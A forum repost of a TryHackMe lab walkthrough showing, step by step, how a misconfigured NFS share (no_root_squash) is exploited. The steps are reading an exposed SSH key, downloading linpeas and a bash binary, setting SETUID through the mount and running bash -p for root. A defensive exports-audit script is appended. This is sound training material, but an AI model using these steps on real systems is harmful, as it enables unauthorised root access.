[Tut] Hacking Network File System (NFS) – A TryHackMe Walkthrough - xSicKxBot - 01-08-2023
<div>
<h2>OBJECTIVE</h2>
<p>NFS (Network File System) is a file system that enables file sharing between computers running different operating systems (Windows/Linux/Mac). 
</p>
<p>In <a href="https://tryhackme.com/room/networkservices2" target="_blank" rel="noreferrer noopener">this practice box</a> from TryHackMe, we will hack into NFS and exploit a misconfiguration (No-root Squash) to obtain root access and find our final <code>root.txt</code> flag.</p>
<h2>WHAT IS NO-ROOT SQUASH?</h2>
<p><strong>No-root Squash</strong> is an uncommon configuration (some might say a misconfiguration) on the NFS file system.</p>
<p>When enabled, it allows remote users to change file permissions on any file and also to add a <code>SETUID</code> bit to effectively run programs as the root user. Normally it is disabled to protect against hackers, and all files created by a remote root user are assigned to an unprivileged owner named <code>nfsnobody</code>.</p>
<p class="has-base-background-color has-background"><strong>Recommended</strong>: If you are interested in learning more technical details about how this works, I’d recommend <a rel="noreferrer noopener" href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/security_guide/s2-server-nfs-noroot" target="_blank">this article</a> on <code>no_root_squash</code> and other configuration options when using NFS.</p>
<h2>ENUMERATION</h2>
<p>We’ll start with a standard Nmap scan of all ports with the <code>-p-</code> flag:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nmap $targetIP -p-</pre>
<p>The scan shows an <code>nfs</code> service running on port. 
Let’s find out what directories are mountable with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">showmount -e $targetIP</pre>
<p>(<code>-e</code> for exports)</p>
<div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="523" height="388" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-29.png" alt="" class="wp-image-1041590" /></figure> </div>
<p>Let’s go ahead and mount the <code>/home</code> directory on our attack machine. I’m using a Parrot OS virtual machine with a MATE desktop environment running in GNOME Boxes. We can mount the <code>nfs</code> directory directly to our local filesystem with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">mount -t nfs $targetIP:/home /mount</pre>
<p>(<code>-t</code> indicates the filesystem type)</p>
<p>And now we can continue further enumeration by poking around the filesystem.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cd /mount
ls -la</pre>
<p>We find a user folder in the home directory, <code>cappuccino</code>, and a hidden directory <code>.ssh</code>. 
Inside the directory there is an <code>id_rsa</code> file that holds a private SSH key.</p>
<h2>INITIAL FOOTHOLD – USER CAPPUCCINO</h2>
<p>After copying the <code>id_rsa</code> over to our attack machine, we can ssh into cappuccino’s account with this command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh -i id_rsa cappuccino@$targetIP</pre>
<h2>ENUMERATING PRIVILEGE ESCALATION ATTACK VECTORS WITH LINPEAS</h2>
<p>Now that we have our initial foothold, we can grab a copy of the well-known script <code>linpeas.sh</code> from <a rel="noreferrer noopener" href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" target="_blank">the official git repo</a> and use it to automate the enumeration of attack vectors for privilege escalation on the 
target machine. We’ll navigate to the <code>/mount</code> folder and use the command <code>wget</code> on our attack machine for this:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh</pre>
<p>Before running the script on our target machine, we need to add execute permissions to the file from our attack machine.</p>
<p><em>The beauty of mounting NFS file systems in Linux is evident here as we can easily add permissions to <code>linpeas.sh</code> from our attack machine to set up the program to be executable on the target machine</em>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">chmod +x linpeas.sh</pre>
<p>Now that <code>linpeas.sh</code> is located in the <code>/home</code> folder of the target machine, we can run it to start the automated enumeration:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">./linpeas.sh</pre>
<p>This will dump a long text file full of details about the target machine. The most interesting things for privilege escalation are highlighted in yellow with red text.</p>
<p>Scrolling through the results, we quickly find the <code>no_root_squash</code> listed under NFS. 
We will now move forward and exploit this misconfiguration, allowing us to escalate privileges to the root user.</p>
<div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="935" height="380" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-30.png" alt="" class="wp-image-1041591" /></figure> </div>
<h2>EXPLOITING NO_ROOT_SQUASH</h2>
<p>First, let’s grab the bash executable for Ubuntu Server 18.04 from the <a rel="noreferrer noopener" href="https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash" target="_blank">link</a> on TryHackMe.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo wget https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash</pre>
<p>Now we add the <code>SETUID</code> bit to the file bash and make it executable. 
This is the key to gaining root access with <code>no_root_squash</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo chmod +sx bash</pre>
<p>Running bash now from our target machine doesn’t seem to change us to the root user yet.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">./bash</pre>
<div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="666" height="239" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-31.png" alt="" class="wp-image-1041592" /></figure> </div>
<p>The final trick we need to use is to enable privileged mode with the flag <code>-p</code>, which keeps bash from dropping the root effective user ID that the <code>SETUID</code> bit provides.</p>
<div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="366" height="136" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-32.png" alt="" class="wp-image-1041594" /></figure> </div>
</div>
https://www.sickgaming.net/blog/2023/01/07/hacking-network-file-system-nfs-a-tryhackme-walkthrough/
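<p>Added example (not part of the original post or of the TryHackMe room): a small Python audit that an administrator can run on an NFS server to parse <code>/etc/exports</code>-style text and flag the <code>no_root_squash</code> setting the walkthrough relies on. The sample export lines and the function names <code>parse_exports</code> and <code>audit_exports</code> are constructed for illustration.</p>

```python
import re
import shlex

# Constructed /etc/exports content for illustration (not from the TryHackMe box).
SAMPLE_EXPORTS = r"""
# path       client(options)
/home        *(rw,sync,no_root_squash)
/srv/backup  10.0.0.0/24(ro,sync) \
             backup01(rw,no_root_squash)
/srv/pub     (ro,all_squash)
"""

CLIENT_RE = re.compile(r"^(?P<host>[^()]*)(?:\((?P<opts>[^()]*)\))?$")


def parse_exports(text):
    """Yield (path, client, options) for every client entry in exports(5) text."""
    joined = re.sub(r"\\\n", " ", text)            # join continuation lines
    for line in joined.splitlines():
        line = line.split("#", 1)[0].strip()       # drop comments
        if not line:
            continue
        path, *clients = shlex.split(line)         # handles quoted paths
        for client in clients or [""]:             # no client listed = any host
            m = CLIENT_RE.match(client)
            if m is None or client.startswith("-"):  # skip default-option tokens
                continue
            opts = set(filter(None, (m["opts"] or "").split(",")))
            yield path, m["host"] or "*", opts     # "(ro)" alone also means any host


def audit_exports(text):
    """Return findings as (severity, path, client, reason) tuples."""
    findings = []
    for path, client, opts in parse_exports(text):
        world = client == "*"
        # root_squash is the default; only an explicit no_root_squash disables it.
        if "no_root_squash" in opts:
            sev = "CRITICAL" if world and "rw" in opts else "HIGH"
            findings.append((sev, path, client, "remote root keeps uid 0 (no_root_squash)"))
        elif world and "rw" in opts:
            findings.append(("MEDIUM", path, client, "writable by any host"))
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print("%-8s %-12s %-12s %s" % finding)
```

<p>A corrected entry such as <code>/home 10.0.0.0/24(rw,sync,root_squash)</code> (constructed) produces no findings. Mounting the exported filesystem with <code>nosuid</code> on the server additionally stops SETUID binaries placed on the share from running with elevated privileges there.</p>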